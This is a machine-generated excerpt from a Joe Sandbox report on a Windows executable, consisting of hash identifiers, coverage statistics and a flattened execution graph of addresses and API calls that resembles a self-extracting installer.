                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                                                                                    • String ID: `W@
                                                                                                                                                                                                                                    • API String ID: 1705453755-883988529
                                                                                                                                                                                                                                    • Opcode ID: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
                                                                                                                                                                                                                                    • Instruction ID: 1c7512448c6eccd8852a64e065144c261afeb287fd377f30d938299290270787
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF0E7B6D00228BBCB11DFE88944ADEBBBCEB48700F1041A6A511F6240D6759A108BD5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:28.6%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                    Total number of Nodes:959
                                                                                                                                                                                                                                    Total number of Limit Nodes:25
                                                                                                                                                                                                                                    execution_graph 3119 10b6c03 3120 10b6c1e 3119->3120 3121 10b6c17 _exit 3119->3121 3122 10b6c27 _cexit 3120->3122 3123 10b6c32 3120->3123 3121->3120 3122->3123 2196 10b6f40 SetUnhandledExceptionFilter 2197 10b4cc0 GlobalFree 3124 10b4200 3125 10b420b SendMessageA 3124->3125 3126 10b421e 3124->3126 3125->3126 3127 10b3100 3128 10b3111 3127->3128 3129 10b31b0 3127->3129 3130 10b311d 3128->3130 3133 10b3149 GetDesktopWindow 3128->3133 3131 10b3141 3129->3131 3132 10b31b9 SendDlgItemMessageA 3129->3132 3130->3131 3134 10b3138 EndDialog 3130->3134 3132->3131 3137 10b43d0 6 API calls 3133->3137 3134->3131 3139 10b4463 SetWindowPos 3137->3139 3140 10b6ce0 4 API calls 3139->3140 3141 10b315d 6 API calls 3140->3141 3141->3131 3142 10b4bc0 3143 10b4c05 3142->3143 3145 10b4bd7 3142->3145 3144 10b4c1b SetFilePointer 3143->3144 3143->3145 3144->3145 3146 10b30c0 3147 10b30de CallWindowProcA 3146->3147 3148 10b30ce 3146->3148 3149 10b30da 3147->3149 3148->3147 3148->3149 3150 10b63c0 3151 10b6407 3150->3151 3152 10b658a CharPrevA 3151->3152 3153 10b6415 CreateFileA 3152->3153 3154 10b643a 3153->3154 3155 10b6448 WriteFile 3153->3155 3158 10b6ce0 4 API calls 3154->3158 3156 10b6465 CloseHandle 3155->3156 3156->3154 3159 10b648f 3158->3159 2198 10b4ad0 2206 10b3680 2198->2206 2201 10b4ae9 2202 10b4aee WriteFile 2203 10b4b0f 2202->2203 2204 10b4b14 2202->2204 2204->2203 2205 10b4b3b SendDlgItemMessageA 2204->2205 2205->2203 2207 10b3691 MsgWaitForMultipleObjects 2206->2207 2208 10b36a9 PeekMessageA 2207->2208 2209 10b36e8 2207->2209 2208->2207 2210 10b36bc 2208->2210 2209->2201 2209->2202 2210->2207 2210->2209 2211 10b36c7 DispatchMessageA 2210->2211 2212 10b36d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 10b4cd0 2214 10b4d0b 2213->2214 2215 10b4cf4 2213->2215 2216 10b4d02 2214->2216 2219 10b4dcb 2214->2219 2222 10b4d25 2214->2222 2215->2216 2217 10b4b60 FindCloseChangeNotification 2215->2217 2270 10b6ce0 2216->2270 2217->2216 2220 10b4dd4 SetDlgItemTextA 2219->2220 2223 10b4de3 2219->2223 2220->2223 2221 10b4e95 2222->2216 2236 10b4c37 2222->2236 2223->2216 2244 10b476d 2223->2244 2227 10b4e38 2227->2216 2253 10b4980 2227->2253 2232 10b4e64 2261 10b47e0 LocalAlloc 2232->2261 2235 10b4e6f 2235->2216 2237 10b4c88 2236->2237 2238 10b4c4c DosDateTimeToFileTime 2236->2238 2237->2216 2241 10b4b60 2237->2241 2238->2237 2239 10b4c5e LocalFileTimeToFileTime 2238->2239 2239->2237 2240 10b4c70 SetFileTime 2239->2240 2240->2237 2242 10b4b92 FindCloseChangeNotification 2241->2242 2243 10b4b76 SetFileAttributesA 2241->2243 2242->2243 2243->2216 2275 10b66ae GetFileAttributesA 2244->2275 2246 10b477b 2246->2227 2247 10b47cc SetFileAttributesA 2248 10b47db 2247->2248 2248->2227 2252 10b47c2 2252->2247 2254 10b4990 2253->2254 2255 10b49c2 lstrcmpA 2254->2255 2256 10b49a5 2254->2256 2258 10b49ba 2255->2258 2259 10b4a0e 2255->2259 2257 10b44b9 20 API calls 2256->2257 2257->2258 2258->2216 2258->2232 2259->2258 2341 10b487a 2259->2341 2262 10b480f LocalAlloc 2261->2262 2263 10b47f6 2261->2263 2266 10b480b 2262->2266 2267 10b4831 2262->2267 2264 10b44b9 20 API calls 2263->2264 2264->2266 2266->2235 2268 10b44b9 20 API calls 2267->2268 2269 10b4846 LocalFree 2268->2269 2269->2266 2271 10b6ceb 2270->2271 2272 10b6ce8 2270->2272 2354 10b6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2271->2354 2272->2221 2274 10b6e26 2274->2221 2276 10b4777 2275->2276 2276->2246 2276->2247 2277 10b6517 FindResourceA 2276->2277 2278 10b656b 2277->2278 2279 10b6536 LoadResource 2277->2279 2284 10b44b9 2278->2284 2279->2278 2280 10b6544 DialogBoxIndirectParamA FreeResource 2279->2280 2280->2278 2282 10b47b1 2280->2282 2282->2247 2282->2248 2282->2252 2285 10b455a 2284->2285 2286 10b44fe LoadStringA 2284->2286 2289 10b6ce0 4 API calls 2285->2289 2287 10b4562 2286->2287 2288 10b4527 2286->2288 2293 10b45c9 2287->2293 2299 10b457e 2287->2299 2290 10b681f 10 API calls 2288->2290 2291 10b4689 2289->2291 2292 10b452c 2290->2292 2291->2282 2294 10b4536 MessageBoxA 2292->2294 2325 10b67c9 2292->2325 2296 10b45cd LocalAlloc 2293->2296 2297 10b4607 LocalAlloc 2293->2297 2294->2285 2296->2285 2301 10b45f3 2296->2301 2297->2285 2307 10b45c4 2297->2307 2299->2299 2303 10b4596 LocalAlloc 2299->2303 2304 10b171e _vsnprintf 2301->2304 2302 10b462d MessageBeep 2313 10b681f 2302->2313 2303->2285 2306 10b45af 2303->2306 2304->2307 2331 10b171e 2306->2331 2307->2302 2310 10b4645 MessageBoxA LocalFree 2310->2285 2311 10b67c9 EnumResourceLanguagesA 2311->2310 2314 10b6940 2313->2314 2315 10b6857 GetVersionExA 2313->2315 2316 10b6ce0 4 API calls 2314->2316 2317 10b687c 2315->2317 2324 10b691a 2315->2324 2318 10b463b 2316->2318 2319 10b68a5 GetSystemMetrics 2317->2319 2317->2324 2318->2310 2318->2311 2320 10b68b5 RegOpenKeyExA 2319->2320 2319->2324 2321 10b68d6 RegQueryValueExA RegCloseKey 2320->2321 2320->2324 2322 10b690c 2321->2322 2321->2324 2335 10b66f9 2322->2335 2324->2314 2326 10b67e2 2325->2326 2327 10b6803 2325->2327 2339 10b6793 EnumResourceLanguagesA 2326->2339 2327->2294 2329 10b67f5 2329->2327 2340 10b6793 EnumResourceLanguagesA 2329->2340 2332 10b172d 2331->2332 2333 10b173d _vsnprintf 2332->2333 2334 10b175d 2332->2334 2333->2334 2334->2307 2336 10b670f 2335->2336 2337 10b6740 CharNextA 2336->2337 2338 10b674b 2336->2338 2337->2336 2338->2324 2339->2329 2340->2327 2342 10b48a2 CreateFileA 2341->2342 2344 10b48e9 2342->2344 2345 10b4908 2342->2345 2344->2345 2346 10b48ee 2344->2346 2345->2258 2349 10b490c 2346->2349 2350 10b48f5 CreateFileA 2349->2350 2352 10b4917 2349->2352 2350->2345 2351 10b4962 CharNextA 2351->2352 2352->2350 2352->2351 2353 10b4953 CreateDirectoryA 2352->2353 2353->2351 2354->2274 3160 10b3210 3161 10b3227 3160->3161 3185 10b328e EndDialog 3160->3185 3162 10b33e2 GetDesktopWindow 3161->3162 3163 10b3235 3161->3163 3166 10b43d0 11 API calls 3162->3166 3165 10b3239 3163->3165 3167 10b32dd GetDlgItemTextA 3163->3167 3168 10b324c 3163->3168 3169 10b33f1 SetWindowTextA SendDlgItemMessageA 3166->3169 3174 10b3366 3167->3174 3179 10b32fc 3167->3179 3171 10b3251 3168->3171 3172 10b32c5 EndDialog 3168->3172 3169->3165 3170 10b341f GetDlgItem EnableWindow 3169->3170 3170->3165 3171->3165 3173 10b325c LoadStringA 3171->3173 3172->3165 3175 10b327b 3173->3175 3176 10b3294 3173->3176 3177 10b44b9 20 API calls 3174->3177 3181 10b44b9 20 API calls 3175->3181 3198 10b4224 LoadLibraryA 3176->3198 3177->3165 3179->3174 3180 10b3331 GetFileAttributesA 3179->3180 3183 10b333f 3180->3183 3184 10b337c 3180->3184 3181->3185 3188 10b44b9 20 API calls 3183->3188 3187 10b658a CharPrevA 3184->3187 3185->3165 3186 10b32a5 SetDlgItemTextA 3186->3165 3186->3175 3189 10b338d 3187->3189 3190 10b3351 3188->3190 3191 10b58c8 27 API calls 3189->3191 3190->3165 3192 10b335a CreateDirectoryA 3190->3192 3193 10b3394 3191->3193 3192->3174 3192->3184 3193->3174 3194 10b33a4 3193->3194 3195 10b33c7 EndDialog 3194->3195 3196 10b597d 34 API calls 3194->3196 3195->3165 3197 10b33c3 3196->3197 3197->3165 3197->3195 3199 10b43b2 3198->3199 3200 10b4246 GetProcAddress 3198->3200 3203 10b44b9 20 API calls 3199->3203 3201 10b425d GetProcAddress 3200->3201 3202 10b43a4 FreeLibrary 3200->3202 3201->3202 3204 10b4274 GetProcAddress 3201->3204 3202->3199 3206 10b329d 3203->3206 3204->3202 3205 10b428b 3204->3205 3207 10b4295 GetTempPathA 3205->3207 3212 10b42e1 3205->3212 3206->3165 3206->3186 3208 10b42ad 3207->3208 3208->3208 3209 10b42b4 CharPrevA 3208->3209 3210 10b42d0 CharPrevA 3209->3210 3209->3212 3210->3212 3211 10b4390 FreeLibrary 3211->3206 3212->3211 3213 10b4a50 3214 10b4a9f ReadFile 3213->3214 3215 10b4a66 3213->3215 3216 10b4abb 3214->3216 3215->3216 3217 10b4a82 memcpy 3215->3217 3217->3216 3218 10b3450 3219 10b345e 3218->3219 3220 10b34d3 EndDialog 3218->3220 3222 10b349a GetDesktopWindow 3219->3222 3226 10b3465 3219->3226 3221 10b346a 3220->3221 3223 10b43d0 11 API calls 3222->3223 3224 10b34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3223->3224 3224->3221 3225 10b348c EndDialog 3225->3221 3226->3221 3226->3225 3227 10b6bef _XcptFilter 2355 10b4ca0 GlobalAlloc 2356 10b6a60 2373 10b7155 2356->2373 2358 10b6a65 2359 10b6a76 GetStartupInfoW 2358->2359 2360 10b6a93 2359->2360 2361 10b6aa8 2360->2361 2362 10b6aaf Sleep 2360->2362 2363 10b6ac7 _amsg_exit 2361->2363 2365 10b6ad1 2361->2365 2362->2360 2363->2365 2364 10b6b13 _initterm 2371 10b6b2e __IsNonwritableInCurrentImage 2364->2371 2365->2364 2366 10b6af4 2365->2366 2365->2371 2367 10b6bd6 _ismbblead 2367->2371 2368 10b6c1e 2368->2366 2369 10b6c27 _cexit 2368->2369 2369->2366 2371->2367 2371->2368 2372 10b6bbe exit 2371->2372 2378 10b2bfb GetVersion 2371->2378 2372->2371 2374 10b717a 2373->2374 2375 10b717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2375 2374->2375 2376 10b71e2 2374->2376 2377 10b71cd 2375->2377 2376->2358 2377->2376 2379 10b2c0f 2378->2379 2380 10b2c50 2378->2380 2379->2380 2382 10b2c13 GetModuleHandleW 2379->2382 2395 10b2caa memset memset memset 2380->2395 2382->2380 2384 10b2c22 GetProcAddress 2382->2384 2384->2380 2390 10b2c34 2384->2390 2385 10b2c8e 2387 10b2c9e 2385->2387 2388 10b2c97 CloseHandle 2385->2388 2387->2371 2388->2387 2390->2380 2393 10b2c89 2489 10b1f90 2393->2489 2506 10b468f FindResourceA SizeofResource 2395->2506 2398 10b2ef3 2401 10b44b9 20 API calls 2398->2401 2399 10b2d2d CreateEventA SetEvent 2400 10b468f 7 API calls 2399->2400 2402 10b2d57 2400->2402 2410 10b2d6e 2401->2410 2403 10b2d5b 2402->2403 2404 10b2e1f 2402->2404 2407 10b468f 7 API calls 2402->2407 2406 10b44b9 20 API calls 2403->2406 2511 10b5c9e 2404->2511 2405 10b6ce0 4 API calls 2408 10b2c62 2405->2408 2406->2410 2411 10b2d9f 2407->2411 2408->2385 2436 10b2f1d 2408->2436 2410->2405 2411->2403 2415 10b2da3 CreateMutexA 2411->2415 2413 10b2e3a 2416 10b2e43 2413->2416 2417 10b2e52 FindResourceA 2413->2417 2414 10b2e30 2414->2398 2415->2404 2418 10b2dbd GetLastError 2415->2418 2537 10b2390 2416->2537 2421 10b2e6e 2417->2421 2422 10b2e64 LoadResource 2417->2422 2418->2404 2420 10b2dca 2418->2420 2424 10b2dea 2420->2424 2425 10b2dd5 2420->2425 2423 10b2e4d 2421->2423 2552 10b36ee GetVersionExA 2421->2552 2422->2421 2423->2410 2427 10b44b9 20 API calls 2424->2427 2426 10b44b9 20 API calls 2425->2426 2428 10b2de8 2426->2428 2429 10b2dff 2427->2429 2431 10b2e04 CloseHandle 2428->2431 2429->2404 2429->2431 2431->2410 2435 10b6517 24 API calls 2435->2423 2437 10b2f3f 2436->2437 2438 10b2f6c 2436->2438 2439 10b2f5f 2437->2439 2641 10b51e5 2437->2641 2660 10b5164 2438->2660 2788 10b3a3f 2439->2788 2441 10b2f71 2444 10b303c 2441->2444 2673 10b55a0 2441->2673 2449 10b6ce0 4 API calls 2444->2449 2451 10b2c6b 2449->2451 2450 10b2f86 GetSystemDirectoryA 2452 10b658a CharPrevA 2450->2452 2476 10b52b6 2451->2476 2453 10b2fab LoadLibraryA 2452->2453 2454 10b2fc0 GetProcAddress 2453->2454 2455 10b2ff7 FreeLibrary 2453->2455 2454->2455 2456 10b2fd6 DecryptFileA 2454->2456 2457 10b3017 SetCurrentDirectoryA 2455->2457 2458 10b3006 2455->2458 2456->2455 2468 10b2ff0 2456->2468 2459 10b3026 2457->2459 2460 10b3054 2457->2460 2458->2457 2721 10b621e GetWindowsDirectoryA 2458->2721 2461 10b44b9 20 API calls 2459->2461 2463 10b3061 2460->2463 2731 10b3b26 2460->2731 2467 10b3037 2461->2467 2463->2444 2465 10b307a 2463->2465 2740 10b256d 2463->2740 2471 10b3098 2465->2471 2751 10b3ba2 2465->2751 2807 10b6285 GetLastError 2467->2807 2468->2455 2471->2444 2474 10b30af 2471->2474 2809 10b4169 2474->2809 2477 10b52d6 2476->2477 2486 10b5316 2476->2486 2478 10b5300 LocalFree LocalFree 2477->2478 2481 10b52eb SetFileAttributesA DeleteFileA 2477->2481 2478->2477 2478->2486 2479 10b538c 2482 10b6ce0 4 API calls 2479->2482 2480 10b5374 2480->2479 3115 10b1fe1 2480->3115 2481->2478 2484 10b2c72 2482->2484 2484->2385 2484->2393 2485 10b535e SetCurrentDirectoryA 2488 10b2390 13 API calls 2485->2488 2486->2480 2486->2485 2487 10b65e8 4 API calls 2486->2487 2487->2485 2488->2480 2490 10b1f9a 2489->2490 2491 10b1f9f 2489->2491 2492 10b1ea7 15 API calls 2490->2492 2493 10b1fc0 2491->2493 2494 10b44b9 20 API calls 2491->2494 2497 10b1fd9 2491->2497 2492->2491 2495 10b1ee2 GetCurrentProcess OpenProcessToken 2493->2495 2496 10b1fcf ExitWindowsEx 2493->2496 2493->2497 2494->2493 2499 10b1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2501 10b1f0e 2495->2501 2496->2497 2497->2385 2500 10b1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 10b1f1f 2500->2502 2503 10b44b9 20 API calls 2501->2503 2504 10b6ce0 4 API calls 2502->2504 2503->2502 2505 10b1f8c 2504->2505 2505->2385 2507 10b2d1a 2506->2507 2508 10b46b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 10b46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 10b46df memcpy_s FreeResource 2509->2510 2510->2507 2518 10b5e17 2511->2518 2520 10b5cc3 2511->2520 2512 10b5dd0 2516 10b5dec GetModuleFileNameA 2512->2516 2512->2518 2513 10b6ce0 4 API calls 2514 10b2e2c 2513->2514 2514->2413 2514->2414 2515 10b5ced CharNextA 2515->2520 2517 10b5e0a 2516->2517 2516->2518 2587 10b66c8 2517->2587 2518->2513 2520->2512 2520->2515 2520->2518 2521 10b6218 2520->2521 2524 10b5e36 CharUpperA 2520->2524 2530 10b5f9f CharUpperA 2520->2530 2531 10b5f59 CompareStringA 2520->2531 2532 10b6003 CharUpperA 2520->2532 2533 10b667f IsDBCSLeadByte CharNextA 2520->2533 2534 10b5edc CharUpperA 2520->2534 2535 10b60a2 CharUpperA 2520->2535 2592 10b658a 2520->2592 2596 10b6e2a 2521->2596 2524->2520 2525 10b61d0 2524->2525 2526 10b44b9 20 API calls 2525->2526 2527 10b61e7 2526->2527 2528 10b61f0 CloseHandle 2527->2528 2529 10b61f7 ExitProcess 2527->2529 2528->2529 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 10b24cb 2537->2538 2541 10b23b9 2537->2541 2539 10b6ce0 4 API calls 2538->2539 2540 10b24dc 2539->2540 2540->2423 2541->2538 2542 10b23e9 FindFirstFileA 2541->2542 2542->2538 2543 10b2407 2542->2543 2544 10b2479 2543->2544 2545 10b2421 lstrcmpA 2543->2545 2546 10b24a9 FindNextFileA 2543->2546 2550 10b658a CharPrevA 2543->2550 2551 10b2390 5 API calls 2543->2551 2548 10b2488 SetFileAttributesA DeleteFileA 2544->2548 2545->2546 2547 10b2431 lstrcmpA 2545->2547 2546->2543 2549 10b24bd FindClose RemoveDirectoryA 2546->2549 2547->2543 2547->2546 2548->2546 2549->2538 2550->2543 2551->2543 2553 10b372d 2552->2553 2557 10b3737 2552->2557 2554 10b44b9 20 API calls 2553->2554 2566 10b39fc 2553->2566 2554->2566 2555 10b6ce0 4 API calls 2556 10b2e92 2555->2556 2556->2410 2556->2423 2567 10b18a3 2556->2567 2557->2553 2559 10b38a4 2557->2559 2557->2566 2603 10b28e8 2557->2603 2559->2553 2560 10b39c1 MessageBeep 2559->2560 2559->2566 2561 10b681f 10 API calls 2560->2561 2562 10b39ce 2561->2562 2563 10b39d8 MessageBoxA 2562->2563 2564 10b67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2555 2568 10b19b8 2567->2568 2569 10b18d5 2567->2569 2570 10b6ce0 4 API calls 2568->2570 2632 10b17ee LoadLibraryA 2569->2632 2572 10b19d5 2570->2572 2572->2423 2572->2435 2574 10b18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 10b1900 GetTokenInformation 2574->2575 2576 10b19aa CloseHandle 2575->2576 2577 10b1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 10b1927 LocalAlloc 2577->2578 2579 10b19a9 2578->2579 2580 10b1938 GetTokenInformation 2578->2580 2579->2576 2581 10b194e AllocateAndInitializeSid 2580->2581 2582 10b19a2 LocalFree 2580->2582 2581->2582 2586 10b196e 2581->2586 2582->2579 2583 10b1999 FreeSid 2583->2582 2584 10b1975 EqualSid 2585 10b198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2590 10b66d5 2587->2590 2588 10b66f3 2588->2518 2590->2588 2591 10b66e5 CharNextA 2590->2591 2599 10b6648 2590->2599 2591->2590 2593 10b659b 2592->2593 2593->2593 2594 10b65ab 2593->2594 2595 10b65b8 CharPrevA 2593->2595 2594->2520 2595->2594 2602 10b6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 10b621d 2600 10b665d IsDBCSLeadByte 2599->2600 2601 10b6668 2599->2601 2600->2601 2601->2590 2602->2598 2604 10b2a62 2603->2604 2611 10b290d 2603->2611 2605 10b2a6e GlobalFree 2604->2605 2606 10b2a75 2604->2606 2605->2606 2606->2559 2608 10b2955 GlobalAlloc 2608->2604 2609 10b2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 10b2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 10b2a80 GlobalUnlock 2611->2612 2613 10b2773 2611->2613 2612->2604 2614 10b27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 10b28b2 2613->2615 2616 10b27db 2614->2616 2617 10b28b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 10b28a8 GetWindowsDirectoryA 2616->2618 2620 10b27e3 2616->2620 2619 10b28bf 2617->2619 2618->2619 2621 10b28d2 2619->2621 2622 10b658a CharPrevA 2619->2622 2624 10b658a CharPrevA 2620->2624 2623 10b6ce0 4 API calls 2621->2623 2622->2621 2625 10b28e2 2623->2625 2626 10b2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 10b2837 RegQueryValueExA 2626->2627 2628 10b289a RegCloseKey 2627->2628 2629 10b285c 2627->2629 2628->2619 2630 10b2867 ExpandEnvironmentStringsA 2629->2630 2631 10b287a 2629->2631 2630->2631 2631->2628 2633 10b1890 2632->2633 2634 10b1826 GetProcAddress 2632->2634 2635 10b6ce0 4 API calls 2633->2635 2636 10b1889 FreeLibrary 2634->2636 2637 10b1839 AllocateAndInitializeSid 2634->2637 2638 10b189f 2635->2638 2636->2633 2637->2636 2639 10b185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 10b468f 7 API calls 2641->2642 2643 10b51f9 LocalAlloc 2642->2643 2644 10b522d 2643->2644 2645 10b520d 2643->2645 2647 10b468f 7 API calls 2644->2647 2646 10b44b9 20 API calls 2645->2646 2648 10b521e 2646->2648 2649 10b523a 2647->2649 2650 10b6285 GetLastError 2648->2650 2651 10b523e 2649->2651 2652 10b5262 lstrcmpA 2649->2652 2659 10b2f4d 2650->2659 2653 10b44b9 20 API calls 2651->2653 2654 10b527e 2652->2654 2655 10b5272 LocalFree 2652->2655 2657 10b524f LocalFree 2653->2657 2656 10b44b9 20 API calls 2654->2656 2655->2659 2658 10b5290 LocalFree 2656->2658 2657->2659 2658->2659 2659->2438 2659->2439 2659->2444 2661 10b468f 7 API calls 2660->2661 2662 10b5175 2661->2662 2663 10b517a 2662->2663 2664 10b51af 2662->2664 2666 10b44b9 20 API calls 2663->2666 2665 10b468f 7 API calls 2664->2665 2667 10b51c0 2665->2667 2668 10b518d 2666->2668 2822 10b6298 2667->2822 2668->2441 2671 10b51e1 2671->2441 2672 10b44b9 20 API calls 2672->2668 2674 10b468f 7 API calls 2673->2674 2675 10b55c7 LocalAlloc 2674->2675 2676 10b55db 2675->2676 2677 10b55fd 2675->2677 2678 10b44b9 20 API calls 2676->2678 2679 10b468f 7 API calls 2677->2679 2680 10b55ec 2678->2680 2681 10b560a 2679->2681 2682 10b6285 GetLastError 2680->2682 2683 10b560e 2681->2683 2684 10b5632 lstrcmpA 2681->2684 2707 10b55f1 2682->2707 2687 10b44b9 20 API calls 2683->2687 2685 10b564b LocalFree 2684->2685 2686 10b5645 2684->2686 2688 10b565b 2685->2688 2689 10b5696 2685->2689 2686->2685 2690 10b561f LocalFree 2687->2690 2695 10b5467 49 API calls 2688->2695 2691 10b589f 2689->2691 2694 10b56ae GetTempPathA 2689->2694 2690->2707 2692 10b6517 24 API calls 2691->2692 2692->2707 2693 10b6ce0 4 API calls 2696 10b2f7e 2693->2696 2697 10b56eb 2694->2697 2698 10b56c3 2694->2698 2699 10b5678 2695->2699 2696->2444 2696->2450 2703 10b586c GetWindowsDirectoryA 2697->2703 2704 10b5717 GetDriveTypeA 2697->2704 2697->2707 2834 10b5467 2698->2834 2702 10b44b9 20 API calls 2699->2702 2699->2707 2702->2707 2868 10b597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2708 10b5730 GetFileAttributesA 2704->2708 2719 10b572b 2704->2719 2707->2693 2708->2719 2710 10b5467 49 API calls 2710->2697 2711 10b2630 21 API calls 2711->2719 2713 10b57c1 GetWindowsDirectoryA 2713->2719 2714 10b658a CharPrevA 2716 10b57e8 GetFileAttributesA 2714->2716 2715 10b597d 34 API calls 2715->2719 2717 10b57fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 10b5827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2707 2719->2708 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 10b5467 49 API calls 2719->2720 2864 10b6952 2719->2864 2720->2719 2722 10b6249 2721->2722 2723 10b6268 2721->2723 2725 10b44b9 20 API calls 2722->2725 2724 10b597d 34 API calls 2723->2724 2726 10b625f 2724->2726 2727 10b625a 2725->2727 2728 10b6ce0 4 API calls 2726->2728 2729 10b6285 GetLastError 2727->2729 2730 10b3013 2728->2730 2729->2726 2730->2444 2730->2457 2732 10b3b2d 2731->2732 2732->2732 2733 10b3b72 2732->2733 2734 10b3b53 2732->2734 2934 10b4fe0 2733->2934 2736 10b6517 24 API calls 2734->2736 2737 10b3b70 2736->2737 2738 10b6298 10 API calls 2737->2738 2739 10b3b7b 2737->2739 2738->2739 2739->2463 2741 10b2583 2740->2741 2742 10b2622 2740->2742 2744 10b258b 2741->2744 2745 10b25e8 RegOpenKeyExA 2741->2745 2961 10b24e0 GetWindowsDirectoryA 2742->2961 2747 10b25e3 2744->2747 2749 10b259b RegOpenKeyExA 2744->2749 2746 10b2609 RegQueryInfoKeyA 2745->2746 2745->2747 2748 10b25d1 RegCloseKey 2746->2748 2747->2465 2748->2747 2749->2747 2750 10b25bc RegQueryValueExA 2749->2750 2750->2748 2752 10b3bdb 2751->2752 2755 10b3bec 2751->2755 2753 10b468f 7 API calls 2752->2753 2753->2755 2754 10b3c03 memset 2754->2755 2755->2754 2756 10b3d13 2755->2756 2759 10b3d26 2755->2759 2762 10b3d7b CompareStringA 2755->2762 2763 10b3fd7 2755->2763 2765 10b3fab 2755->2765 2768 10b3f1e LocalFree 2755->2768 2769 10b3f46 LocalFree 2755->2769 2772 10b468f 7 API calls 2755->2772 2774 10b3cc7 CompareStringA 2755->2774 2785 10b3e10 2755->2785 2969 10b1ae8 2755->2969 3010 10b202a memset memset RegCreateKeyExA 2755->3010 3036 10b3fef 2755->3036 2757 10b44b9 20 API calls 2756->2757 2757->2759 2760 10b6ce0 4 API calls 2759->2760 2761 10b3f60 2760->2761 2761->2471 2762->2755 2762->2763 2763->2759 3060 10b2267 2763->3060 2767 10b44b9 20 API calls 2765->2767 2771 10b3fbe LocalFree 2767->2771 2768->2755 2768->2763 2769->2759 2771->2759 2772->2755 2774->2755 2775 10b3e1f GetProcAddress 2778 10b3f64 2775->2778 2775->2785 2776 10b3f92 2777 10b44b9 20 API calls 2776->2777 2779 10b3fa9 2777->2779 2780 10b44b9 20 API calls 2778->2780 2781 10b3f7c LocalFree 2779->2781 2782 10b3f75 FreeLibrary 2780->2782 2783 10b6285 GetLastError 2781->2783 2782->2781 2784 10b3f8b 2783->2784 2784->2759 2785->2775 2785->2776 2786 10b3eff FreeLibrary 2785->2786 2787 10b3f40 FreeLibrary 2785->2787 3050 10b6495 2785->3050 2786->2768 2787->2769 2789 10b468f 7 API calls 2788->2789 2790 10b3a55 LocalAlloc 2789->2790 2791 10b3a8e 2790->2791 2792 10b3a6c 2790->2792 2794 10b468f 7 API calls 2791->2794 2793 10b44b9 20 API calls 2792->2793 2795 10b3a7d 2793->2795 2796 10b3a98 2794->2796 2797 10b6285 GetLastError 2795->2797 2798 10b3a9c 2796->2798 2799 10b3ac5 lstrcmpA 2796->2799 2805 10b2f64 2797->2805 2800 10b44b9 20 API calls 2798->2800 2801 10b3ada 2799->2801 2802 10b3b0d LocalFree 2799->2802 2803 10b3aad LocalFree 2800->2803 2804 10b6517 24 API calls 2801->2804 2802->2805 2803->2805 2806 10b3aec LocalFree 2804->2806 2805->2438 2805->2444 2806->2805 2808 10b628f 2807->2808 2808->2444 2810 10b468f 7 API calls 2809->2810 2811 10b417d LocalAlloc 2810->2811 2812 10b41a8 2811->2812 2813 10b4195 2811->2813 2814 10b468f 7 API calls 2812->2814 2815 10b44b9 20 API calls 2813->2815 2816 10b41b5 2814->2816 2817 10b41a6 2815->2817 2818 10b41c5 lstrcmpA 2816->2818 2820 10b41b9 2816->2820 2817->2444 2819 10b41e6 LocalFree 2818->2819 2818->2820 2819->2817 2821 10b44b9 20 API calls 2820->2821 2821->2819 2823 10b171e _vsnprintf 2822->2823 2833 10b62c9 FindResourceA 2823->2833 2825 10b62cb LoadResource LockResource 2826 10b6353 2825->2826 2829 10b62e0 2825->2829 2827 10b6ce0 4 API calls 2826->2827 2828 10b51ca 2827->2828 2828->2671 2828->2672 2830 10b631b FreeResource 2829->2830 2831 10b6355 FreeResource 2829->2831 2832 10b171e _vsnprintf 2830->2832 2831->2826 2832->2833 2833->2825 2833->2826 2835 10b548a 2834->2835 2853 10b551a 2834->2853 2894 10b53a1 2835->2894 2837 10b5581 2841 10b6ce0 4 API calls 2837->2841 2840 10b5495 2840->2837 2844 10b550c 2840->2844 2845 10b54c2 GetSystemInfo 2840->2845 2846 10b559a 2841->2846 2842 10b553b CreateDirectoryA 2847 10b5577 2842->2847 2848 10b5547 2842->2848 2843 10b554d 2843->2837 2849 10b597d 34 API calls 2843->2849 2850 